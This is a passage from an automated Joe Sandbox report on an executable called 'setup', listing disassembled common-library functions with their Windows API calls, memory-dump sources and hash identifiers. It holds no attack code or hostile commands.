                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Path$Find$CharCloseErrorFileFirstFullH_prolog3_InformationLastNameRootStripUpperVolume
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2323451338-0
                                                                                                                          • Opcode ID: 9da95b74b1a0ac3bd21f0013b132f3c4b942716f1a6a69f73ddcac41b329f2b1
                                                                                                                          • Instruction ID: 9693ebd30dffd9135ebf879e1c19160da84f611cfd6ad4fe26b5fe8eb7101f06
                                                                                                                          • Opcode Fuzzy Hash: 9da95b74b1a0ac3bd21f0013b132f3c4b942716f1a6a69f73ddcac41b329f2b1
                                                                                                                          • Instruction Fuzzy Hash: 65418271504219AFEB24AB64CD8DFBEB77CBF00310F144699F95992191EF31AEC4DA60
                                                                                                                          Function 00C8D970 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __floor_pentium4
                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                          • Opcode ID: c6bfa9430899e19b6bdad392c2f50b2531058efea5d5a0c93cb9e11343ecb488
                                                                                                                          • Instruction ID: 99a176a8e3dd91379f98e05ca2de15d3eb89082bcb0c6be435b0d3e553d2ea02
                                                                                                                          • Opcode Fuzzy Hash: c6bfa9430899e19b6bdad392c2f50b2531058efea5d5a0c93cb9e11343ecb488
                                                                                                                          • Instruction Fuzzy Hash: 9FD24B71E082298FDB65DE28CC447EAB7B5FB44309F1441EAD81EE7240E778AE819F45
                                                                                                                          Function 00C1C1D3 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsIconic.USER32(?), ref: 00C1C1E9
                                                                                                                            • Part of subcall function 00C2CFF3: __EH_prolog3.LIBCMT ref: 00C2CFFA
                                                                                                                            • Part of subcall function 00C2CFF3: BeginPaint.USER32(?,?,00000004,00C389E0,?,00000058,00C1C274), ref: 00C2D026
                                                                                                                          • SendMessageW.USER32(?,00000027,?,00000000), ref: 00C1C208
                                                                                                                          • GetSystemMetrics.USER32(0000000B), ref: 00C1C216
                                                                                                                          • GetSystemMetrics.USER32(0000000C), ref: 00C1C21C
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C1C22E
                                                                                                                          • DrawIcon.USER32(?,?,?,?), ref: 00C1C25B
                                                                                                                            • Part of subcall function 00C2D187: EndPaint.USER32(?,?,4641B5ED,?,00000000,00C9219E,000000FF,?,00C38A02,?,?,00000058,00C1C274), ref: 00C2D1B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsPaintSystem$BeginClientDrawH_prolog3IconIconicMessageRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2989630354-0
                                                                                                                          • Opcode ID: b773db74d494283a2cb952f7d346879d907b52c7ee17b7f052ad22bede69141b
                                                                                                                          • Instruction ID: 4ee34f7d97281fe33f8c1cf9bad5f816465dd977f9a96759b5da4c4a6ec9eb5a
                                                                                                                          • Opcode Fuzzy Hash: b773db74d494283a2cb952f7d346879d907b52c7ee17b7f052ad22bede69141b
                                                                                                                          • Instruction Fuzzy Hash: C0115E31A00219AFCF00DFB8DD89BAE7BBAEF48310F150265F905EB1A5DA70A954DB50
                                                                                                                          Function 00C3C97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007B,00000104,00000104,?,?,?,?), ref: 00C3C9F0
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?), ref: 00C3C9FD
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 00C3CA0B
                                                                                                                            • Part of subcall function 00C3CAC7: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000104), ref: 00C3CADE
                                                                                                                            • Part of subcall function 00C3CAC7: GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 00C3CAEE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$AddressFileFindFirstHandleModuleProc
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 496933282-438819550
                                                                                                                          • Opcode ID: 7ed1411729e21c496a2b7b3c3e907c040f5668293ffed740573ac6762532831e
                                                                                                                          • Instruction ID: 2cc5c0434bf436374d3bbee941f227d64b726aaf3f150f0d767c812e8bd9eee1
                                                                                                                          • Opcode Fuzzy Hash: 7ed1411729e21c496a2b7b3c3e907c040f5668293ffed740573ac6762532831e
                                                                                                                          • Instruction Fuzzy Hash: 203138B2A1031877DB10BB759C86FAF726C9F85710F114229F512F71C2DE749A04E7A0
                                                                                                                          Function 00C3CAC7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000104), ref: 00C3CADE
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FindFirstFileTransactedW), ref: 00C3CAEE
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: FindFirstFileTransactedW$kernel32.dll
                                                                                                                          • API String ID: 1646373207-2878570079
                                                                                                                          • Opcode ID: 3f24cbfdb2c6d413bf704e20f236d0e1083bb117f9b7746e892b256752f3fbca
                                                                                                                          • Instruction ID: 2a63aa71b76dae3730e45d2b77a3e89404f9972a97d22d6792ac466451a1275f
                                                                                                                          • Opcode Fuzzy Hash: 3f24cbfdb2c6d413bf704e20f236d0e1083bb117f9b7746e892b256752f3fbca
                                                                                                                          • Instruction Fuzzy Hash: 92F01D32215605AFEB241B64EC8DB7EB7DCFB047A9F10413AB964E10E0CB718D50CB60
                                                                                                                          Function 00C12626 Relevance: 6.2, APIs: 4, Instructions: 206keyboardwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFocus.USER32 ref: 00C12634
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00C1266D
                                                                                                                          • GetKeyState.USER32(00000010), ref: 00C12683
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,00000000,00000000,000000FF,000000FF), ref: 00C12880
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: State$FocusInvalidateRect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3352495673-0
                                                                                                                          • Opcode ID: 1b8f52e05ffb52ac7fb2ddeeb217d531ae30b78328af9c888a31cd0e1a32c70d
                                                                                                                          • Instruction ID: b6894c509163f5189fcde011cc63c17120d7e4a567ddceb83bc918241ccec7a3
                                                                                                                          • Opcode Fuzzy Hash: 1b8f52e05ffb52ac7fb2ddeeb217d531ae30b78328af9c888a31cd0e1a32c70d
                                                                                                                          • Instruction Fuzzy Hash: AB61A33E7040119BDA2CA728C498AFEB7A1AF8B310F190159F466972D1DB209DF1BBC1
                                                                                                                          Function 00C1ACBD Relevance: 6.2, APIs: 4, Instructions: 162windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C1ACC4
                                                                                                                            • Part of subcall function 00C24DE6: __EH_prolog3.LIBCMT ref: 00C24DED
                                                                                                                            • Part of subcall function 00C24DE6: GetObjectW.GDI32(?,0000005C,?), ref: 00C24F22
                                                                                                                            • Part of subcall function 00C24DE6: GetObjectW.GDI32(?,0000005C,?), ref: 00C24F48
                                                                                                                            • Part of subcall function 00C24DE6: LoadLibraryW.KERNEL32(MSIMG32.DLL), ref: 00C24F57
                                                                                                                            • Part of subcall function 00C24DE6: GetProcAddress.KERNEL32(00000000,GradientFill), ref: 00C24F6D
                                                                                                                            • Part of subcall function 00C0FB2B: __EH_prolog3.LIBCMT ref: 00C0FB32
                                                                                                                            • Part of subcall function 00C0FB2B: InitializeCriticalSection.KERNEL32(?), ref: 00C0FC0B
                                                                                                                            • Part of subcall function 00C0FB2B: SystemParametersInfoW.USER32(00000068,00000000,?,00000000), ref: 00C0FC7D
                                                                                                                            • Part of subcall function 00C0FB2B: LoadCursorW.USER32(00000000,00007F01), ref: 00C0FCA9
                                                                                                                          • LoadIconW.USER32(?,00000080), ref: 00C1AE5A
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000E,?,00000002), ref: 00C1AEA8
                                                                                                                          • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000002), ref: 00C1AEBA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3InfoLoad$LocaleObject$AddressCriticalCursorIconInitializeLibraryParametersProcSectionSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 858056783-0
                                                                                                                          • Opcode ID: 85fcbebd6e12da065a074f4059832b00cde12dcf4c437d996237af5eda886e62
                                                                                                                          • Instruction ID: 49316410400e7e089b6cdad5dcaba9b60a4927fae66fea3e78dbbe6e13c89fb1
                                                                                                                          • Opcode Fuzzy Hash: 85fcbebd6e12da065a074f4059832b00cde12dcf4c437d996237af5eda886e62
                                                                                                                          • Instruction Fuzzy Hash: 5D515B70915350AEDB44DF68C88579A7BE4EF08700F1441BAED4CDF2A6DBB49A41CFA2
                                                                                                                          Function 00C38F65 Relevance: 6.1, APIs: 4, Instructions: 84threadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C38F6F
                                                                                                                            • Part of subcall function 00C3A35B: __EH_prolog3.LIBCMT ref: 00C3A362
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 00C38FCE
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00C38FD7
                                                                                                                          • GetVersionExW.KERNEL32 ref: 00C39073
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_Version
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 786120064-0
                                                                                                                          • Opcode ID: 1b2829549d5cd4d08a4b81e4f8330ee63b3a4b9cb4c73b4d20c6217113c4498e
                                                                                                                          • Instruction ID: 2dbe6c9cd32fe625dc92aa07c45348583701b4fd45e3ee81e7f0e2f7d1cd1fcf
                                                                                                                          • Opcode Fuzzy Hash: 1b2829549d5cd4d08a4b81e4f8330ee63b3a4b9cb4c73b4d20c6217113c4498e
                                                                                                                          • Instruction Fuzzy Hash: 4441BAB0911B048FD7619F6A898478AFAF1BF48700F908A6EE1AE87711DB70A944CF45
                                                                                                                          Function 00C47B31 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C47B3D
                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00C47C09
                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C47C22
                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00C47C2C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 254469556-0
                                                                                                                          • Opcode ID: 2dc4d127debc6d6e88f2e9a7e3503357edac6b5de471f01afd2779053da014c3
                                                                                                                          • Instruction ID: d82891e3ee9b4a77f88b8a72a70e7a3a2f359f42bd2cd03c921e43446e9722ee
                                                                                                                          • Opcode Fuzzy Hash: 2dc4d127debc6d6e88f2e9a7e3503357edac6b5de471f01afd2779053da014c3
                                                                                                                          • Instruction Fuzzy Hash: A931F675D052189BDB21EFA4D9897CDBBB8BF08300F1041AAE40DAB290EB719B849F45
                                                                                                                          Function 00C31419 Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
                                                                                                                          • GetKeyState.USER32(00000010), ref: 00C31436
                                                                                                                          • GetKeyState.USER32(00000011), ref: 00C31443
                                                                                                                          • GetKeyState.USER32(00000012), ref: 00C31450
                                                                                                                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00C3146A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1063413437-0
                                                                                                                          • Opcode ID: 02b0c8f7f3e54d09d56e000adbf585b4136e8a5be8f2214c5de5c3485fa7baef
                                                                                                                          • Instruction ID: be3ded3815c59e510a2974e0e4c073a494cc90883ac4b01b1eca818633b79b5a
                                                                                                                          • Opcode Fuzzy Hash: 02b0c8f7f3e54d09d56e000adbf585b4136e8a5be8f2214c5de5c3485fa7baef
                                                                                                                          • Instruction Fuzzy Hash: 9BF0A7353A02663FDA343F319C0DBAD65285F44B44F490535BAD2EE0D1DEA089415960
                                                                                                                          Function 00C56EA0 Relevance: 5.6, Strings: 4, Instructions: 561COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: #%d$#x%X$invalid entity type found$nbktext
                                                                                                                          • API String ID: 0-3606178694
                                                                                                                          • Opcode ID: 31aaa02036fcca9b56bbd2026a2a6282bb1a1da781eab375152d8d65c9ce644e
                                                                                                                          • Instruction ID: 9fa10fd44164e615cf4420669efcce3978d31fbf92698beff2f7ad0dca3a1787
                                                                                                                          • Opcode Fuzzy Hash: 31aaa02036fcca9b56bbd2026a2a6282bb1a1da781eab375152d8d65c9ce644e
                                                                                                                          • Instruction Fuzzy Hash: 2212E178904201DBDF21CF64E885B7AB7B5FF50312F14466EEC2A4B242E7319AC9CB95
                                                                                                                          Function 00C2CC10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,?,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CC24
                                                                                                                          • GetLastError.KERNEL32(?,?,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CC5B
                                                                                                                            • Part of subcall function 00C2CD2F: GetModuleFileNameW.KERNEL32(?,?,00000105,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CDDF
                                                                                                                            • Part of subcall function 00C2CD2F: SetLastError.KERNEL32(0000006F,?,00C34AFB,?,00CBA218,00000010,00C2F239,?), ref: 00C2CDF3
                                                                                                                          Strings
                                                                                                                          • IsolationAware function called after IsolationAwareCleanup, xrefs: 00C2CC1F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$DebugFileModuleNameOutputString
                                                                                                                          • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                                                                          • API String ID: 3265401609-2690750368
                                                                                                                          • Opcode ID: cc7f72e5e9f34630d9e0920cb34ec327f6c6e9581f58d71d52687aa558ae5b98
                                                                                                                          • Instruction ID: 4c2ae64bcd01beb96ce74470dac4432432ca8756eddc8e156bad15b59dbcc116
                                                                                                                          • Opcode Fuzzy Hash: cc7f72e5e9f34630d9e0920cb34ec327f6c6e9581f58d71d52687aa558ae5b98
                                                                                                                          • Instruction Fuzzy Hash: 10F0C230240235865B385BB9FCC4B2E7648A70A750318063AFD2CC3921DB20CE50CAD1
                                                                                                                          Function 00C480CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C27A8F: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,00C480F9,?,?,?,00C0126F), ref: 00C27A95
                                                                                                                            • Part of subcall function 00C27A8F: GetLastError.KERNEL32(?,00C480F9,?,?,?,00C0126F), ref: 00C27A9F
                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00C0126F), ref: 00C480FD
                                                                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C0126F), ref: 00C4810C
                                                                                                                          Strings
                                                                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C48107
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
